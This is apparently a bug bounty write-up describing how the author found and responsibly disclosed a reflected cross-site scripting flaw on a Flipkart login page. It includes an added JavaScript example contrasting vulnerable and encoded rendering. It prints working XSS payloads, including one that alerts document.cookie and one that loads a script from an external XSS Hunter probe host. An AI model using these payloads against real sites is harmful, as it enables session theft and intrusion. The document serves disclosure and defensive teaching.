Hello Everyone….
I hope you all are doing well. This write-up is about a Flipkart Cross-Site Scripting vulnerability.
If you are into InfoSec or development, you have probably already heard about Cross-Site Scripting, one of the vulnerabilities in the OWASP Top 10. For those who don’t know about XSS, here is a short introduction.
XSS (Cross-Site Scripting)
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. Because the victim’s browser trusts the site that served the page, the injected script runs with that site’s privileges in the victim’s session.
When I was searching for a bug bounty program, I came across the Flipkart bug bounty program. In that program, for a valid submission Flipkart mentions the bug bounty hunter’s name in their Hall of Fame. So I decided to give it a try.
Started hunting on Flipkart…..
After some recon, I found one issue related to a missing rate limit 😍🙌
Fri, 20 Nov 2020 – Reported that issue to the Flipkart Security team.
Sun, 22 Nov 2020 – Got a response from the team, and it’s a duplicate 😥
Disappointed…
Then I decided to give it a second try 😎🤏
I started my hunting journey on Flipkart again. This time I followed proper recon steps, beginning with subdomain enumeration, and came across one of the Flipkart domains. It was a normal login form page.
I tried SQL injection here, but got no result. Then I tried a normal XSS payload on a URL parameter. Hey, it works 🤓🙌. An XSS alert popped up.
Payload: Test?"></script><script>alert(document.cookie)</script>
If I reported this issue as it is, it’s a self-XSS. Some programs will not accept this issue, because the impact is low. So we need to increase the impact.
The real hunt started from here….. XSS Hunter
What is XSS Hunter
XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.
So it’s a very good tool for blind XSS. If the XSS only fires on the client side, in our own browser, we can see it, so the impact is low. If it fires in an internal panel or admin dashboard, the impact is high: we can get their session-id cookie, etc. One nice feature of XSS Hunter is that when a payload executes on an internal dashboard or anywhere else, it sends an alert email and creates a POC for that particular endpoint on the XSS Hunter page.
I used one basic XSS Hunter payload on the same URL parameter.
Payload: Test"><script src=https://lohigowda.xss.ht></script>
Heyyyy 😍… I received an email from XSS Hunter and the POC was created. Here we can see the triggering IP, the URL location, and a screenshot of that page.
So finally, I was done with bug hunting, and it was reporting time. I prepared a clean report and submitted it to the Flipkart security team.
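To show, from the defender’s side, why both payloads above work and what actually closes the hole, here is an added example (my code, not the author’s and not Flipkart’s): a small page template that reflects a URL parameter into a quoted attribute, once by raw concatenation and once through HTML attribute encoding. The template, the parameter name `next`, the helper names and the probe host are assumptions for illustration; the payload strings follow the write-up’s, with straight quotes.

```javascript
// Added example, not code from the original write-up or from Flipkart.
// Shows how a URL parameter reflected into an HTML attribute becomes the
// reflected XSS described above, and how contextual output encoding stops
// it. Template, parameter name and helper names are assumptions.

// Encode the characters that can change meaning in HTML text and in
// double- or single-quoted attribute values. Ampersand goes first so the
// other replacements are not re-encoded.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Vulnerable rendering: the untrusted parameter is concatenated straight
// into a quoted attribute. A value beginning with `">` closes the attribute
// and the <input> tag, so whatever follows is parsed as markup.
function renderLoginVulnerable(next) {
  return '<form action="/login">' +
    '<input type="hidden" name="next" value="' + next + '">' +
    '</form>';
}

// Hardened rendering: the same template, but the value is HTML-encoded
// before insertion, so it can never leave the attribute it was placed in.
function renderLoginSafe(next) {
  return '<form action="/login">' +
    '<input type="hidden" name="next" value="' + escapeHtml(next) + '">' +
    '</form>';
}

// Structural check used by this example only: does the rendered document
// contain a <script> element that the template itself never emits?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// The write-up's two payload shapes, with straight quotes. The probe host
// is a constructed placeholder, not a real XSS Hunter endpoint.
const REFLECTED_PAYLOAD = 'Test?"></script><script>alert(document.cookie)</script>';
const BLIND_PAYLOAD = 'Test"><script src=https://probe.example.invalid></script>';

// Render one payload through both versions and summarise whether a foreign
// <script> element survived, so the outcome can be checked without a browser.
function compare(payload) {
  return {
    vulnerableExecutes: containsScriptTag(renderLoginVulnerable(payload)),
    hardenedExecutes: containsScriptTag(renderLoginSafe(payload)),
  };
}

console.log(compare(REFLECTED_PAYLOAD)); // { vulnerableExecutes: true, hardenedExecutes: false }
console.log(compare(BLIND_PAYLOAD));     // { vulnerableExecutes: true, hardenedExecutes: false }
```

Two caveats worth keeping in mind. Encoding has to match the context the value lands in: this helper is right for HTML text and quoted attributes, but a value placed inside a JavaScript block, a URL, or an unquoted attribute needs a different encoder. And the session-cookie impact discussed above depends on the cookie being readable from `document.cookie`; marking session cookies `HttpOnly` removes that particular consequence even where an injection remains, which is why it is a second line of defence rather than a replacement for output encoding.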
Report Timeline:
Thu, 17 Dec 2020 – Reported to the Security Team
18 Dec 2020 – First response from the team
28 Dec 2020 – Bug accepted
5 Jan 2021 – Issue fixed
08 Jan 2021 – Acknowledged in their Hall of Fame.
Hall Of Fame
Thanks for reading!….Happy Hacking!
Linkedin: Lohith Gowda M
Twitter: lohigowda_in
Portfolio: https://www.lohigowda.in/